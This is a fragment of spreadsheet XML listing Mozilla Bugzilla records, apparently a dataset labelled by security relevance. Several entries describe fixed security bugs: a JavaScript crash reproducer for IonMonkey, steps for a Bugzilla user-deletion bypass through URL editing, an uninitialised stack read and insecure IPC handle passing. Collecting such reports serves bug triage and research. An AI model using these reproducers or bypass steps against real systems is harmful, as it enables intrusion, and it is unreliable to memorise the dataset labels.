      <c r="H5749" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5749" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5749" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5749" t="inlineStr">
        <is>
          <t>6 Branch</t>
        </is>
      </c>
      <c r="L5749" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5749" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5749" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5749" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P5749" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5749" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5749" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5749" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5749" t="n">
        <v>1</v>
      </c>
      <c r="U5749" t="n">
        <v>0</v>
      </c>
      <c r="V5749" t="n">
        <v>4</v>
      </c>
      <c r="W5749" t="inlineStr">
        <is>
          <t>1. Open this URL: http://people.mozilla.com/~mclaypotch/jscagematch/rainbow.gif
2. Share to twitter with F1.
3. Get a crash/assertion.
In a debugger, this was the stack trace:
 	ntdll.dll!_NtRaiseException@12()  + 0x12 bytes	
 	ntdll.dll!_NtRaiseException@12()  + 0x12 bytes	
 	mozjs.dll!js::gc::Cell::isMarked(unsigned int color)  Line 518	C++
&gt;	mozjs.dll!js::CompartmentChecker::fail(JSCompartment * c1, JSCompartment * c2)  Line 121 + 0x11 bytes	C++
 	mozjs.dll!js::CompartmentChecker::check(JSCompartment * c)  Line 137 + 0x10 bytes	C++
 	mozjs.dll!js::CompartmentChecker::check(JSString * str)  Line 151	C++
 	mozjs.dll!js::CompartmentChecker::check(const js::Value &amp; v)  Line 158	C++
 	mozjs.dll!js::assertSameCompartment&lt;JSObject *,js::Value&gt;(JSContext * cx, JSObject * t1, js::Value t2)  Line 229	C++
 	mozjs.dll!js::CallJSPropertyOp(JSContext * cx, int (JSContext *, JSObject *, jsid, js::Value *)* op, JSObject * receiver, jsid id, js::Value * vp)  Line 328 + 0x17 bytes	C++
 	mozjs.dll!js::Shape::get(JSContext * cx, JSObject * receiver, JSObject * obj, JSObject * pobj, js::Value * vp)  Line 283 + 0x51 bytes	C++
 	mozjs.dll!js_NativeGetInline(JSContext * cx, JSObject * receiver, JSObject * obj, JSObject * pobj, const js::Shape * shape, unsigned int getHow, js::Value * vp)  Line 5218 + 0x1c bytes	C++
 	mozjs.dll!js_GetPropertyHelperWithShapeInline(JSContext * cx, JSObject * obj, JSObject * receiver, jsid id, unsigned int getHow, js::Value * vp, const js::Shape * * shapeOut, JSObject * * holderOut)  Line 5400 + 0x21 bytes	C++
 	mozjs.dll!js_GetPropertyHelperInline(JSContext * cx, JSObject * obj, JSObject * receiver, jsid id, unsigned int getHow, js::Value * vp)  Line 5421 + 0x25 bytes	C++
 	mozjs.dll!js_GetPropertyHelper(JSContext * cx, JSObject * obj, jsid id, unsigned int getHow, js::Value * vp)  Line 5427 + 0x1d bytes	C++
 	mozjs.dll!js::Interpret(JSContext * cx, js::StackFrame * entryFrame, unsigned int inlineCallCount, js::InterpMode interpMode)  Line 4095 + 0x74 bytes	C++
 	mozjs.dll!js::RunScript(JSContext * cx, JSScript * script, js::StackFrame * fp)  Line 613 + 0x11 bytes	C++
 	mozjs.dll!js::Invoke(JSContext * cx, const js::CallArgs &amp; argsRef, js::ConstructOption option)  Line 694 + 0x11 bytes	C++
 	mozjs.dll!js::ExternalInvoke(JSContext * cx, const js::Value &amp; thisv, const js::Value &amp; fval, unsigned int argc, js::Value * argv, js::Value * rval)  Line 816 + 0xf bytes	C++
 	mozjs.dll!js::JSProxyHandler::call(JSContext * cx, JSObject * proxy, unsigned int argc, js::Value * vp)  Line 273 + 0x31 bytes	C++
 	mozjs.dll!JSWrapper::call(JSContext * cx, JSObject * wrapper, unsigned int argc, js::Value * vp)  Line 250 + 0x43 bytes	C++
 	mozjs.dll!JSCrossCompartmentWrapper::call(JSContext * cx, JSObject * wrapper, unsigned int argc, js::Value * vp)  Line 652 + 0x18 bytes	C++
 	mozjs.dll!js::JSProxy::call(JSContext * cx, JSObject * proxy, unsigned int argc, js::Value * vp)  Line 839 + 0x28 bytes	C++
 	mozjs.dll!js::proxy_Call(JSContext * cx, unsigned int argc, js::Value * vp)  Line 1104 + 0x15 bytes	C++
 	mozjs.dll!js::CallJSNative(JSContext * cx, int (JSContext *, unsigned int, js::Value *)* native, unsigned int argc, js::Value * vp)  Line 277 + 0xf bytes	C++
 	mozjs.dll!js::Invoke(JSContext * cx, const js::CallArgs &amp; argsRef, js::ConstructOption option)  Line 649 + 0x22 bytes	C++
 	mozjs.dll!js::ExternalInvoke(JSContext * cx, const js::Value &amp; thisv, const js::Value &amp; fval, unsigned int argc, js::Value * argv, js::Value * rval)  Line 816 + 0xf bytes	C++
 	mozjs.dll!JS_CallFunctionValue(JSContext * cx, JSObject * obj, jsval_layout fval, unsigned int argc, jsval_layout * argv, jsval_layout * rval)  Line 5080 + 0x45 bytes	C++
 	xul.dll!nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS * wrapper, unsigned short methodIndex, const XPTMethodDescriptor * info, nsXPTCMiniVariant * nativeParams)  Line 1662 + 0x38 bytes	C++
 	xul.dll!nsXPCWrappedJS::CallMethod(unsigned short methodIndex, const XPTMethodDescriptor * info, nsXPTCMiniVariant * params)  Line 587	C++
 	xul.dll!PrepareAndDispatch(nsXPTCStubBase * self, unsigned int methodIndex, unsigned int * args, unsigned int * stackBytesToPop)  Line 114 + 0x21 bytes	C++
 	xul.dll!SharedStub()  Line 142	C++
 	xul.dll!nsEventListenerManager::HandleEventSubType(nsListenerStruct * aListenerStruct, nsIDOMEventListener * aListener, nsIDOMEvent * aDOMEvent, nsPIDOMEventTarget * aCurrentTarget, unsigned int aPhaseFlags, nsCxPusher * aPusher)  Line 1142 + 0x12 bytes	C++
 	xul.dll!nsEventListenerManager::HandleEventInternal(nsPresContext * aPresContext, nsEvent * aEvent, nsIDOMEvent * * aDOMEvent, nsPIDOMEventTarget * aCurrentTarget, unsigned int aFlags, nsEventStatus * aEventStatus, nsCxPusher * aPusher)  Line 1239 + 0x27 bytes	C++
 	xul.dll!nsEventListenerManager::HandleEvent(nsPresContext * aPresContext, nsEvent * aEvent, nsIDOMEvent * * aDOMEvent, nsPIDOMEventTarget * aCurrentTarget, unsigned int aFlags, nsEventStatus * aEventStatus, nsCxPusher * aPusher)  Line 147	C++
 	xul.dll!nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor &amp; aVisitor, unsigned int aFlags, int aMayHaveNewListenerManagers, nsCxPusher * aPusher)  Line 216	C++
 	xul.dll!nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor &amp; aVisitor, unsigned int aFlags, nsDispatchingCallback * aCallback, int aMayHaveNewListenerManagers, nsCxPusher * aPusher)  Line 346	C++
 	xul.dll!nsEventDispatcher::Dispatch(nsISupports * aTarget, nsPresContext * aPresContext, nsEvent * aEvent, nsIDOMEvent * aDOMEvent, nsEventStatus * aEventStatus, nsDispatchingCallback * aCallback, nsCOMArray&lt;nsPIDOMEventTarget&gt; * aTargets)  Line 648 + 0x1e bytes	C++
 	xul.dll!PostMessageEvent::Run()  Line 6015 + 0x2f bytes	C++
 	xul.dll!nsThread::ProcessNextEvent(int mayWait, int * result)  Line 618 + 0x19 bytes	C++
 	xul.dll!NS_ProcessNextEvent_P(nsIThread * thread, int mayWait)  Line 245 + 0x16 bytes	C++
 	xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate * aDelegate)  Line 110 + 0xe bytes	C++
 	xul.dll!MessageLoop::RunInternal()  Line 219	C++
 	xul.dll!MessageLoop::RunHandler()  Line 203	C++
 	xul.dll!MessageLoop::Run()  Line 177	C++
 	xul.dll!nsBaseAppShell::Run()  Line 191	C++
 	xul.dll!nsAppShell::Run()  Line 249 + 0x9 bytes	C++
 	xul.dll!nsAppStartup::Run()  Line 222 + 0x1c bytes	C++
 	xul.dll!XRE_main(int argc, char * * argv, const nsXREAppData * aAppData)  Line 3686 + 0x25 bytes	C++
 	firefox.exe!NS_internal_main(int argc, char * * argv)  Line 158 + 0x12 bytes	C++
 	firefox.exe!wmain(int argc, wchar_t * * argv)  Line 106 + 0xd bytes	C++
 	firefox.exe!__tmainCRTStartup()  Line 552 + 0x19 bytes	C
 	firefox.exe!wmainCRTStartup()  Line 371	C
 	kernel32.dll!@BaseThreadInitThunk@12()  + 0x12 bytes	
 	ntdll.dll!___RtlUserThreadStart@8()  + 0x27 bytes	
 	ntdll.dll!__RtlUserThreadStart@8()  + 0x1b bytes</t>
        </is>
      </c>
      <c r="X5749" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5750">
      <c r="A5750" t="n">
        <v>842300</v>
      </c>
      <c r="B5750" t="inlineStr">
        <is>
          <t>2013-02-18 07:12:20 -0800</t>
        </is>
      </c>
      <c r="C5750" t="inlineStr">
        <is>
          <t>IonMonkey: Crash [@ js::GetObjectClass] with invalid read</t>
        </is>
      </c>
      <c r="D5750" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:57 -0800</t>
        </is>
      </c>
      <c r="E5750" t="n">
        <v>1</v>
      </c>
      <c r="F5750" t="n">
        <v>1</v>
      </c>
      <c r="G5750" t="n">
        <v>3</v>
      </c>
      <c r="H5750" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5750" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5750" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5750" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5750" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5750" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5750" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5750" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5750" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main20+]</t>
        </is>
      </c>
      <c r="Q5750" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5750" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5750" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T5750" t="n">
        <v>1</v>
      </c>
      <c r="U5750" t="n">
        <v>0</v>
      </c>
      <c r="V5750" t="n">
        <v>18</v>
      </c>
      <c r="W5750" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 0acbd06d48a9 (run with --ion-eager):
evaluate("\
  var x = function g() {\
    return g.toString();\
  };\
  x('y')\
", { noScriptRval : true });
evaluate("\
  x('y')\
", { noScriptRval : true });</t>
        </is>
      </c>
      <c r="X5750" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5751">
      <c r="A5751" t="n">
        <v>1156961</v>
      </c>
      <c r="B5751" t="inlineStr">
        <is>
          <t>2015-04-21 13:32:50 -0700</t>
        </is>
      </c>
      <c r="C5751" t="inlineStr">
        <is>
          <t>Make sure FTP scraper works for 38.0.5 beta cycle</t>
        </is>
      </c>
      <c r="D5751" t="inlineStr">
        <is>
          <t>2015-05-28 08:50:35 -0700</t>
        </is>
      </c>
      <c r="E5751" t="n">
        <v>1</v>
      </c>
      <c r="F5751" t="n">
        <v>1</v>
      </c>
      <c r="G5751" t="n">
        <v>4</v>
      </c>
      <c r="H5751" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5751" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5751" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K5751" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5751" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5751" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5751" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5751" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5751" t="inlineStr"/>
      <c r="Q5751" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5751" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5751" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5751" t="n">
        <v>1</v>
      </c>
      <c r="U5751" t="n">
        <v>0</v>
      </c>
      <c r="V5751" t="n">
        <v>29</v>
      </c>
      <c r="W5751" t="inlineStr">
        <is>
          <t>This might only need a test to make sure it works fine, but perhaps it may need some work as well.
We will be shipping a Firefox 38.0.5 on June 2 (after a 38.0 on May 12) and we are accommodating that with some peculiarities in beta delivery:
Today or tomorrow, 38.0 is being lifted onto mozilla-release and further 38.0 betas will be shipped from that repository (starting with 38.0b7 going to build on Thursday, April 23).
The mozilla-beta repository will have patches for 38.0.5 from then on but will not ship betas until 38.0 is ready for shipping, then that code will actually be put on the mozilla-release repo (so that m-b can hold the code for 39 until that is coming out with its own betas).
On May 11 (probably), a 38.0.5b1 will go to build, followed by a small number of further 38.0.5 betas up to the end of May, including a 38.0.5 RC (which we call b99 in Socorro usually).
We'll need to make sure that FTP scraper correctly detects and makes available the betas shipped from the mozilla-release repository, correctly detects beta version numbers such as 38.0.b1, including the RC (38.0.5b99) and the generic bneta-catch-all (38.0.5b).</t>
        </is>
      </c>
      <c r="X5751" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5752">
      <c r="A5752" t="n">
        <v>697095</v>
      </c>
      <c r="B5752" t="inlineStr">
        <is>
          <t>2011-10-25 07:21:26 -0700</t>
        </is>
      </c>
      <c r="C5752" t="inlineStr">
        <is>
          <t>Unable to open more tabs than current screen-height permits in landscape view</t>
        </is>
      </c>
      <c r="D5752" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E5752" t="n">
        <v>1</v>
      </c>
      <c r="F5752" t="n">
        <v>1</v>
      </c>
      <c r="G5752" t="n">
        <v>6</v>
      </c>
      <c r="H5752" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5752" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5752" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5752" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5752" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5752" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5752" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5752" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5752" t="inlineStr"/>
      <c r="Q5752" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5752" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5752" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5752" t="n">
        <v>1</v>
      </c>
      <c r="U5752" t="n">
        <v>0</v>
      </c>
      <c r="V5752" t="n">
        <v>3</v>
      </c>
      <c r="W5752" t="inlineStr">
        <is>
          <t>Created attachment 569360
Nightly (10/25)
The existent 'tab menu' panel will only permit a certain number of tabs, no more no less than the current screen-height before the panel bounces back. Any attempt to scroll down to reach the 'New Tab' button is denied.
Example, on my Galaxy SII I can only open 8 tabs.
--
Mozilla/5.0 (Android; Linux armv7l; rv:10.0a1) Gecko/20111025 Firefox/10.0a1
Samsung Galaxy SII (Android 2.3.4)</t>
        </is>
      </c>
      <c r="X5752" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5753">
      <c r="A5753" t="n">
        <v>1534300</v>
      </c>
      <c r="B5753" t="inlineStr">
        <is>
          <t>2019-03-11 08:40:45 -0700</t>
        </is>
      </c>
      <c r="C5753" t="inlineStr">
        <is>
          <t>`moz-phab patch` can't handle unicode character in commit message</t>
        </is>
      </c>
      <c r="D5753" t="inlineStr">
        <is>
          <t>2019-09-30 07:36:54 -0700</t>
        </is>
      </c>
      <c r="E5753" t="n">
        <v>1</v>
      </c>
      <c r="F5753" t="n">
        <v>1</v>
      </c>
      <c r="G5753" t="n">
        <v>7</v>
      </c>
      <c r="H5753" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5753" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J5753" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K5753" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5753" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5753" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5753" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5753" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5753" t="inlineStr"/>
      <c r="Q5753" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5753" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5753" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5753" t="n">
        <v>1</v>
      </c>
      <c r="U5753" t="n">
        <v>0</v>
      </c>
      <c r="V5753" t="n">
        <v>5</v>
      </c>
      <c r="W5753" t="inlineStr">
        <is>
          <t>split from bug 1533864.
```
$ moz-phab patch D21631 --apply-to .
Revision D21631 has child(ren). Would you like to patch the full stack?. (YES/No/Always)? no
Patching revisions: D21623 D21624 D21625 D21626 D21627 D21628 D21629 D21630 D21631
ff29f140d687
Checked out .
Bookmark set to D21631_1
applying /tmp/tmpwCO3jJ
applying /tmp/tmpm25uhu
applying /tmp/tmphGx6aO
applying /tmp/tmpmpd5e7
applying /tmp/tmpvvuz0o
applying /tmp/tmp3UdzDB
applying /tmp/tmplFrMzy
applying /tmp/tmpFdKz9D
UnicodeEncodeError: 'ascii' codec can't encode character u'\u2019' in position 423: ordinal not in range(128)
```</t>
        </is>
      </c>
      <c r="X5753" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5754">
      <c r="A5754" t="n">
        <v>141557</v>
      </c>
      <c r="B5754" t="inlineStr">
        <is>
          <t>2002-05-01 12:58:39 -0700</t>
        </is>
      </c>
      <c r="C5754" t="inlineStr">
        <is>
          <t>allowuserdeletion security hole in edituser.cgi</t>
        </is>
      </c>
      <c r="D5754" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E5754" t="n">
        <v>1</v>
      </c>
      <c r="F5754" t="n">
        <v>1</v>
      </c>
      <c r="G5754" t="n">
        <v>4</v>
      </c>
      <c r="H5754" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5754" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5754" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K5754" t="inlineStr">
        <is>
          <t>2.14.1</t>
        </is>
      </c>
      <c r="L5754" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5754" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5754" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5754" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5754" t="inlineStr">
        <is>
          <t>applied to 2.14.2</t>
        </is>
      </c>
      <c r="Q5754" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5754" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5754" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5754" t="n">
        <v>1</v>
      </c>
      <c r="U5754" t="n">
        <v>0</v>
      </c>
      <c r="V5754" t="n">
        <v>13</v>
      </c>
      <c r="W5754" t="inlineStr">
        <is>
          <t>If I'm a user with the ability to edit other users then I have the ability to
delete other users regardless of the allowuserdeletion parameter flag. I simply
select a user, then change 'edit' to 'del' in the URL.
This is due to two missing "exit;" lines in editusers.cgi. To find them do a
search for "PutTrailer" in editusers.cgi - after every occurence of PutTrailer
(except the definition) there should be an exit on the next line.
Cheers,</t>
        </is>
      </c>
      <c r="X5754" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5755">
      <c r="A5755" t="n">
        <v>1473994</v>
      </c>
      <c r="B5755" t="inlineStr">
        <is>
          <t>2018-07-06 13:00:27 -0700</t>
        </is>
      </c>
      <c r="C5755" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::ServiceWorkerRegistration::UpdateStateInternal</t>
        </is>
      </c>
      <c r="D5755" t="inlineStr">
        <is>
          <t>2018-07-16 06:43:58 -0700</t>
        </is>
      </c>
      <c r="E5755" t="n">
        <v>1</v>
      </c>
      <c r="F5755" t="n">
        <v>1</v>
      </c>
      <c r="G5755" t="n">
        <v>3</v>
      </c>
      <c r="H5755" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5755" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5755" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K5755" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5755" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5755" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5755" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5755" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5755" t="inlineStr"/>
      <c r="Q5755" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5755" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5755" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5755" t="n">
        <v>1</v>
      </c>
      <c r="U5755" t="n">
        <v>0</v>
      </c>
      <c r="V5755" t="n">
        <v>3</v>
      </c>
      <c r="W5755" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-e29b09b0-5ae1-4089-af3d-9bfa60180706.
=============================================================
Top 10 frames of crashing thread:
0 xul.dll mozilla::dom::ServiceWorkerRegistration::UpdateStateInternal dom/serviceworkers/ServiceWorkerRegistration.cpp:521
1 xul.dll mozilla::dom::ServiceWorkerRegistration::UpdateState dom/serviceworkers/ServiceWorkerRegistration.cpp:158
2 xul.dll nsresult mozilla::detail::RunnableFunction&lt;&lt;lambda_00e55fe9ddf96ce82bce0e7e71dcd374&gt; &gt;::Run xpcom/threads/nsThreadUtils.h:552
3 xul.dll mozilla::SchedulerGroup::Runnable::Run xpcom/threads/SchedulerGroup.cpp:337
4 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1051
5 xul.dll mozilla::ipc::MessagePump::Run ipc/glue/MessagePump.cpp:97
6 xul.dll mozilla::ipc::MessagePumpForChildProcess::Run ipc/glue/MessagePump.cpp:301
7 xul.dll MessageLoop::RunHandler ipc/chromium/src/base/message_loop.cc:318
8 xul.dll MessageLoop::Run ipc/chromium/src/base/message_loop.cc:298
9 xul.dll nsBaseAppShell::Run widget/nsBaseAppShell.cpp:158
=============================================================
There are 3 crashes (from 2 installations) in nightly 63 with buildid 20180705220111. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1471912.
[1] https://hg.mozilla.org/mozilla-central/rev?node=82c864c3a549</t>
        </is>
      </c>
      <c r="X5755" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5756">
      <c r="A5756" t="n">
        <v>1033020</v>
      </c>
      <c r="B5756" t="inlineStr">
        <is>
          <t>2014-07-01 14:03:00 -0700</t>
        </is>
      </c>
      <c r="C5756" t="inlineStr">
        <is>
          <t>Make BaslineFrame::returnValue match InterpreterFrame::returnValue</t>
        </is>
      </c>
      <c r="D5756" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:01 -0700</t>
        </is>
      </c>
      <c r="E5756" t="n">
        <v>1</v>
      </c>
      <c r="F5756" t="n">
        <v>1</v>
      </c>
      <c r="G5756" t="n">
        <v>3</v>
      </c>
      <c r="H5756" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5756" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5756" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5756" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5756" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5756" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5756" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5756" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5756" t="inlineStr">
        <is>
          <t>[adv-main33+]</t>
        </is>
      </c>
      <c r="Q5756" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5756" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5756" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T5756" t="n">
        <v>1</v>
      </c>
      <c r="U5756" t="n">
        <v>0</v>
      </c>
      <c r="V5756" t="n">
        <v>6</v>
      </c>
      <c r="W5756" t="inlineStr">
        <is>
          <t>Created attachment 8448970
missing_hasReturnValue_check-v0.diff
Right now, if you access BaselineFrame::returnValue and !hasReturnValue, you get random stack data (note, this should at least have had an assertion). On the other hand, it is safe to call InterpreterFrame::returnValue whenever: it will just give back UndefinedValue. This makes AbstractFramePointer's wrapper have inconsistent behavior. In particular, Debugger::slowPathOnLeaveFrame was not checking hasReturnValue, causing exception aborts in the debugger with jit frames on stack to read random memory from the stack as a Value.
I think the right fix here is to make both frame classes behave the same.</t>
        </is>
      </c>
      <c r="X5756" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5757">
      <c r="A5757" t="n">
        <v>1566608</v>
      </c>
      <c r="B5757" t="inlineStr">
        <is>
          <t>2019-07-16 14:05:20 -0700</t>
        </is>
      </c>
      <c r="C5757" t="inlineStr">
        <is>
          <t>IPC passing of Windows HANDLEs and macOS Mach ports is insecure</t>
        </is>
      </c>
      <c r="D5757" t="inlineStr">
        <is>
          <t>2022-08-26 23:29:20 -0700</t>
        </is>
      </c>
      <c r="E5757" t="n">
        <v>1</v>
      </c>
      <c r="F5757" t="n">
        <v>1</v>
      </c>
      <c r="G5757" t="n">
        <v>3</v>
      </c>
      <c r="H5757" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5757" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5757" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K5757" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5757" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5757" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5757" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5757" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5757" t="inlineStr">
        <is>
          <t>[adv-main96+][fixed by 1734735 and 1732343]</t>
        </is>
      </c>
      <c r="Q5757" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5757" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5757" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T5757" t="n">
        <v>1</v>
      </c>
      <c r="U5757" t="n">
        <v>0</v>
      </c>
      <c r="V5757" t="n">
        <v>10</v>
      </c>
      <c r="W5757" t="inlineStr">
        <is>
          <t>This is [Chromium bug 493414](https://crbug.com/493414) from 2015; they also have a [design document][doc] that goes into more details.  The way they used to pass `HANDLE`s between processes, and what we still do, is for the sending process to do the equivalent of [`DuplicateHandle`][dup] (brokered through the sandbox) to create a handle valid for the destination process, then send that through IPC as bits.
We also do [something similar][mach] with Mach ports, basically taking Mach's primitive for atomically transferring data with attached capabilities, which is what we want, and turning it into the equivalent of `DuplicateHandle`, which we don't want, but unfortunately IPC was designed around it.
